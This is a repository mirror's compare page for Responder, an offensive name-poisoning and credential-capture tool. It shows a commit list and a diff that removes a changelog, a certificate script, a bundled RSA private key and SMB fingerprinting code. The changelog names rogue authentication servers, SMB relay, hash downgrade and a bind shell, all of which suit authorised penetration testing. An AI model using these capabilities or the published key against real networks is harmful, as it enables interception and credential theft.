mirror of
https://github.com/lgandx/Responder.git
synced 2025-12-06 12:41:31 +00:00
Compare commits
129 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
29ad8a0816 | ||
|
|
23151fee42 | ||
|
|
82fe64dfd9 | ||
|
|
c3372d9bb6 | ||
|
|
881dae59cf | ||
|
|
ecd62c322f | ||
|
|
1d99ab648f | ||
|
|
b34fee1d8c | ||
|
|
85d7974513 | ||
|
|
2e1651f8fd | ||
|
|
8b65b763ad | ||
|
|
a9c2b297c6 | ||
|
|
a765a8f094 | ||
|
|
b5caa27445 | ||
|
|
d9258e2dd8 | ||
|
|
0bdc183093 | ||
|
|
25c8aeff8c | ||
|
|
393e5dba54 | ||
|
|
a81a9a31e4 | ||
|
|
dc26493305 | ||
|
|
994d02da23 | ||
|
|
480aaa73d0 | ||
|
|
b96df7a5e8 | ||
|
|
9b8af33fcd | ||
|
|
e4f40d7a76 | ||
|
|
4a32ce7779 | ||
|
|
fd98ef770d | ||
|
|
bb43557993 | ||
|
|
9a72afc6b5 | ||
|
|
08c3a90b40 | ||
|
|
eee552b895 | ||
|
|
a84b3513e1 | ||
|
|
e19e34997e | ||
|
|
133b933dc2 | ||
|
|
59337ab87d | ||
|
|
86fb1ab328 | ||
|
|
2e9dd48b86 | ||
|
|
2fb6a1c228 | ||
|
|
8e9205b102 | ||
|
|
f2a2ffbe87 | ||
|
|
04c841d34e | ||
|
|
6f8652c0fc | ||
|
|
df63c1fc13 | ||
|
|
165a362fde | ||
|
|
8171a96b9e | ||
|
|
f5a8bf0650 | ||
|
|
6e951c838a | ||
|
|
a66322a307 | ||
|
|
448db124cb | ||
|
|
e9bb86f42e | ||
|
|
98cf6dc4b2 | ||
|
|
83ee962ab6 | ||
|
|
0b4f961b79 | ||
|
|
8e24d506ff | ||
|
|
55658c3900 | ||
|
|
063b31e6ca | ||
|
|
7be76336d6 | ||
|
|
4906e7dbb7 | ||
|
|
fb42aa35a9 | ||
|
|
16e6464748 | ||
|
|
f0257bc919 | ||
|
|
0fec40c3b4 | ||
|
|
08535e5539 | ||
|
|
ac1789dd6c | ||
|
|
392257be36 | ||
|
|
6eca29d08c | ||
|
|
fdea6328d3 | ||
|
|
008b492c98 | ||
|
|
59e48e80dd | ||
|
|
8d7563ba35 | ||
|
|
d0f5b9a39e | ||
|
|
a4364ba8cb | ||
|
|
892f3a6ca7 | ||
|
|
b2830e0a4f | ||
|
|
6edc01d851 | ||
|
|
5ab431a4fe | ||
|
|
c9eca961cc | ||
|
|
ee033e0c7f | ||
|
|
e155b4ef81 | ||
|
|
d40fe44bcf | ||
|
|
62ed8f0062 | ||
|
|
cb9c2c8b97 | ||
|
|
3261288c82 | ||
|
|
a882d397a8 | ||
|
|
26d205eb2e | ||
|
|
3ef3c23ed6 | ||
|
|
8923016cbc | ||
|
|
38969832ce | ||
|
|
bc06818ed1 | ||
|
|
3c00567fa6 | ||
|
|
53e208c1b4 | ||
|
|
75664a4f37 | ||
|
|
867bcdde03 | ||
|
|
066c15154d | ||
|
|
c6de2e9d3a | ||
|
|
050edc22f3 | ||
|
|
f4bd612e08 | ||
|
|
889bc5949f | ||
|
|
ddaa9f8767 | ||
|
|
6c7a5dd0dd | ||
|
|
7a95ef1474 | ||
|
|
36ef78f85a | ||
|
|
c05bdfce17 | ||
|
|
cf7b4771ca | ||
|
|
f69e93c02e | ||
|
|
235f0fa8ae | ||
|
|
0660cc2fe7 | ||
|
|
823915fe44 | ||
|
|
5c9fec923c | ||
|
|
4558861ce2 | ||
|
|
af30d21908 | ||
|
|
a21aaf7987 | ||
|
|
2e4ed61bba | ||
|
|
365505f95c | ||
|
|
1c79bedac9 | ||
|
|
dcede0fdf5 | ||
|
|
c97a13c1bd | ||
|
|
f377326d96 | ||
|
|
b14ff0b36a | ||
|
|
05b78079a8 | ||
|
|
90479adcca | ||
|
|
a1a4f46c7b | ||
|
|
81b1f8f2c1 | ||
|
|
d0fc37fa42 | ||
|
|
f5b21d992a | ||
|
|
2fdc74a089 | ||
|
|
68eefb1e05 | ||
|
|
cff67bd4ba | ||
|
|
094824bfd3 |
5
.gitignore
vendored
Normal file
5
.gitignore
vendored
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
# Responder logs
|
||||||
|
*.db
|
||||||
|
*.txt
|
||||||
|
*.log
|
||||||
|
logs/*
|
||||||
55
CHANGELOG
55
CHANGELOG
@@ -1,55 +0,0 @@
|
|||||||
ChangeLog Responder 2.0:
|
|
||||||
- Added: -F command line switch to force NTLM authentication on PAC file retrieval.
|
|
||||||
- Added: Ability to inject custom HTML in HTTP responses.
|
|
||||||
- Added: New WPAD proxy server. Enabled by default.
|
|
||||||
- Several improvements.
|
|
||||||
- Added: SMTP module
|
|
||||||
- Added: POP3 module
|
|
||||||
- Added: MSSQL plaintext auth support
|
|
||||||
- Added: SMB Relay
|
|
||||||
- Added: NBT-NS name is now printed.
|
|
||||||
- Added: -I command line switch (network interface). When set, this option override Responder.conf Bind_to setting.
|
|
||||||
- Added: Ability to change the HTML payload returned after authentication. See Responder.conf
|
|
||||||
- Added: Ability to change the pac script in Responder.conf
|
|
||||||
- Added: Configuration file for Responder. See Responder.conf
|
|
||||||
- Removed: Several options removed.
|
|
||||||
- Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
|
|
||||||
- Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
|
|
||||||
- Added: Ability to bind Responder to a specific interface
|
|
||||||
- Fix: Several fixes
|
|
||||||
- Added: HTTPS module.
|
|
||||||
- Added: Support for LM Hash downgrade.
|
|
||||||
- Added: WPAD transparent proxy server.
|
|
||||||
- Fix: minor bug fix
|
|
||||||
- Fix: Fixed bug in HTTP server.
|
|
||||||
- Added: Rogue LDAP auth server. Supports clear text password and NTLMSSP.
|
|
||||||
- Added: Ability to turn on/off the DNS server.
|
|
||||||
- Added: Icmp-Redirect.py for MITM Windows XP/2003 and earlier Domain members.
|
|
||||||
- Added: SMB Clear Text function for NT4 specific.
|
|
||||||
- Added: DNS server module.
|
|
||||||
- Added: FTP server module.
|
|
||||||
- Added: Ability to find the PDC in stealth mode with the Browser listener.
|
|
||||||
- Several changes.
|
|
||||||
- Removed: -d option (Domain), useless for now.
|
|
||||||
- Added: SMB Extended Security NTLMSSP authentication.
|
|
||||||
- Added: Fingerprint module.
|
|
||||||
- Added: Ability to turn off independently capture services.(mubix)
|
|
||||||
- Added: Function to grab HTTP cookies.
|
|
||||||
- Fix: Typo in logfile description.
|
|
||||||
- Added: Option for logging to a file (ravenium).
|
|
||||||
- Added: Basic exception handling for server sockets (ravenium).
|
|
||||||
- Added: Logging functionality, now logs all Responder activity to a file with date and time.
|
|
||||||
- Added: Print IP address to stdout for each protocol.
|
|
||||||
- Improvement: Added new line on Writedata (atucom).
|
|
||||||
- Improvement: final Hash is now printed to stdout instead of NT and LM.
|
|
||||||
- Fix: Fixed spelling in README (atucom).
|
|
||||||
- Fix: Removed hardcoded challenge for SQL NTLM.
|
|
||||||
- Fix: Removed hardcoded challenge for HTTP NTLM.
|
|
||||||
- Added an HTTP server with support for ntlmv1/v2 and basic Auth.
|
|
||||||
- Added command line switch support with optparse.
|
|
||||||
- Added -r switch, which allows turning On/Off Wredir answers.
|
|
||||||
- Added the possibility to turn off HTTP server using the -s switch.
|
|
||||||
- Added LLMNR module.
|
|
||||||
- Fixed bug in NTLMv1 hash parsing when clientOs and ClientVersion are
|
|
||||||
empty.
|
|
||||||
- Several minor changes.
|
|
||||||
@@ -1,2 +0,0 @@
|
|||||||
#!/bin/bash
|
|
||||||
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
|
|
||||||
@@ -1,19 +0,0 @@
|
|||||||
-----BEGIN CERTIFICATE-----
|
|
||||||
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
|
|
||||||
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
|
|
||||||
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
|
|
||||||
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
|
|
||||||
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
|
|
||||||
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
|
|
||||||
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
|
|
||||||
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
|
|
||||||
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
|
|
||||||
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
|
|
||||||
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
|
|
||||||
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
|
|
||||||
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
|
|
||||||
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
|
|
||||||
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
|
|
||||||
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
|
|
||||||
1eVgF/UkX9fqJg==
|
|
||||||
-----END CERTIFICATE-----
|
|
||||||
@@ -1,27 +0,0 @@
|
|||||||
-----BEGIN RSA PRIVATE KEY-----
|
|
||||||
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
|
|
||||||
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
|
|
||||||
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
|
|
||||||
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
|
|
||||||
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
|
|
||||||
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
|
|
||||||
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
|
|
||||||
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
|
|
||||||
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
|
|
||||||
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
|
|
||||||
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
|
|
||||||
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
|
|
||||||
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
|
|
||||||
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
|
|
||||||
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
|
|
||||||
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
|
|
||||||
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
|
|
||||||
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
|
|
||||||
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
|
|
||||||
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
|
|
||||||
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
|
|
||||||
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
|
|
||||||
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
|
|
||||||
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
|
|
||||||
KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
|
|
||||||
-----END RSA PRIVATE KEY-----
|
|
||||||
134
Fingerprint.py
134
Fingerprint.py
@@ -1,134 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import re,sys,socket,struct,string
|
|
||||||
from socket import *
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
class SMBHeader(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
|
||||||
("cmd", "\x72"),
|
|
||||||
("error-code", "\x00\x00\x00\x00" ),
|
|
||||||
("flag1", "\x00"),
|
|
||||||
("flag2", "\x00\x00"),
|
|
||||||
("pidhigh", "\x00\x00"),
|
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("reserved", "\x00\x00"),
|
|
||||||
("tid", "\x00\x00"),
|
|
||||||
("pid", "\x00\x00"),
|
|
||||||
("uid", "\x00\x00"),
|
|
||||||
("mid", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBNego(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x00"),
|
|
||||||
("bcc", "\x62\x00"),
|
|
||||||
("data", "")
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
|
|
||||||
|
|
||||||
class SMBNegoData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("separator1","\x02" ),
|
|
||||||
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
|
||||||
("separator2","\x02"),
|
|
||||||
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
|
||||||
("separator3","\x02"),
|
|
||||||
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
|
|
||||||
("separator4","\x02"),
|
|
||||||
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
|
|
||||||
("separator5","\x02"),
|
|
||||||
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
|
|
||||||
("separator6","\x02"),
|
|
||||||
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBSessionFingerData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x0c"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("reserved","\x00" ),
|
|
||||||
("andxoffset", "\x00\x00"),
|
|
||||||
("maxbuff","\x04\x11"),
|
|
||||||
("maxmpx", "\x32\x00"),
|
|
||||||
("vcnum","\x00\x00"),
|
|
||||||
("sessionkey", "\x00\x00\x00\x00"),
|
|
||||||
("securitybloblength","\x4a\x00"),
|
|
||||||
("reserved2","\x00\x00\x00\x00"),
|
|
||||||
("capabilities", "\xd4\x00\x00\xa0"),
|
|
||||||
("bcc1",""),
|
|
||||||
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
|
||||||
|
|
||||||
|
|
||||||
def OsNameClientVersion(data):
|
|
||||||
try:
|
|
||||||
lenght = struct.unpack('<H',data[43:45])[0]
|
|
||||||
pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
|
|
||||||
var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
|
|
||||||
OsVersion, ClientVersion = tuple(var)
|
|
||||||
return OsVersion, ClientVersion
|
|
||||||
except:
|
|
||||||
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
|
|
||||||
|
|
||||||
def RunSmbFinger(host):
|
|
||||||
s = socket(AF_INET, SOCK_STREAM)
|
|
||||||
s.connect(host)
|
|
||||||
s.settimeout(0.7)
|
|
||||||
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
|
|
||||||
n = SMBNego(data = SMBNegoData())
|
|
||||||
n.calculate()
|
|
||||||
packet0 = str(h)+str(n)
|
|
||||||
buffer0 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer0)
|
|
||||||
data = s.recv(2048)
|
|
||||||
if data[8:10] == "\x72\x00":
|
|
||||||
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
|
|
||||||
t = SMBSessionFingerData()
|
|
||||||
t.calculate()
|
|
||||||
final = t
|
|
||||||
packet0 = str(head)+str(final)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
if data[8:10] == "\x73\x16":
|
|
||||||
return OsNameClientVersion(data)
|
|
||||||
@@ -1,132 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import re,socket,struct
|
|
||||||
from socket import *
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
class SMBHeader(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
|
||||||
("cmd", "\x72"),
|
|
||||||
("error-code", "\x00\x00\x00\x00" ),
|
|
||||||
("flag1", "\x00"),
|
|
||||||
("flag2", "\x00\x00"),
|
|
||||||
("pidhigh", "\x00\x00"),
|
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("reserved", "\x00\x00"),
|
|
||||||
("tid", "\x00\x00"),
|
|
||||||
("pid", "\x00\x00"),
|
|
||||||
("uid", "\x00\x00"),
|
|
||||||
("mid", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBNego(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x00"),
|
|
||||||
("bcc", "\x62\x00"),
|
|
||||||
("data", "")
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
|
|
||||||
|
|
||||||
class SMBNegoData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("separator1","\x02" ),
|
|
||||||
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
|
||||||
("separator2","\x02"),
|
|
||||||
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
|
||||||
("separator3","\x02"),
|
|
||||||
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
|
|
||||||
("separator4","\x02"),
|
|
||||||
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
|
|
||||||
("separator5","\x02"),
|
|
||||||
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
|
|
||||||
("separator6","\x02"),
|
|
||||||
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBSessionFingerData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x0c"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("reserved","\x00" ),
|
|
||||||
("andxoffset", "\x00\x00"),
|
|
||||||
("maxbuff","\x04\x11"),
|
|
||||||
("maxmpx", "\x32\x00"),
|
|
||||||
("vcnum","\x00\x00"),
|
|
||||||
("sessionkey", "\x00\x00\x00\x00"),
|
|
||||||
("securitybloblength","\x4a\x00"),
|
|
||||||
("reserved2","\x00\x00\x00\x00"),
|
|
||||||
("capabilities", "\xd4\x00\x00\xa0"),
|
|
||||||
("bcc1",""),
|
|
||||||
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
|
||||||
|
|
||||||
|
|
||||||
def OsNameClientVersion(data):
|
|
||||||
lenght = struct.unpack('<H',data[43:45])[0]
|
|
||||||
pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
|
|
||||||
var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
|
|
||||||
OsVersion = tuple(var)[0]
|
|
||||||
return OsVersion
|
|
||||||
|
|
||||||
|
|
||||||
def RunSmbFinger(host):
|
|
||||||
s = socket(AF_INET, SOCK_STREAM)
|
|
||||||
s.connect(host)
|
|
||||||
s.settimeout(0.7)
|
|
||||||
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
|
|
||||||
n = SMBNego(data = SMBNegoData())
|
|
||||||
n.calculate()
|
|
||||||
packet0 = str(h)+str(n)
|
|
||||||
buffer0 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer0)
|
|
||||||
data = s.recv(2048)
|
|
||||||
if data[8:10] == "\x72\x00":
|
|
||||||
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
|
|
||||||
t = SMBSessionFingerData()
|
|
||||||
t.calculate()
|
|
||||||
final = t
|
|
||||||
packet0 = str(head)+str(final)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
if data[8:10] == "\x73\x16":
|
|
||||||
return OsNameClientVersion(data)
|
|
||||||
2
HTTPCookies/.gitignore
vendored
2
HTTPCookies/.gitignore
vendored
@@ -1,2 +0,0 @@
|
|||||||
*
|
|
||||||
!.gitignore
|
|
||||||
163
HTTPPackets.py
163
HTTPPackets.py
@@ -1,163 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
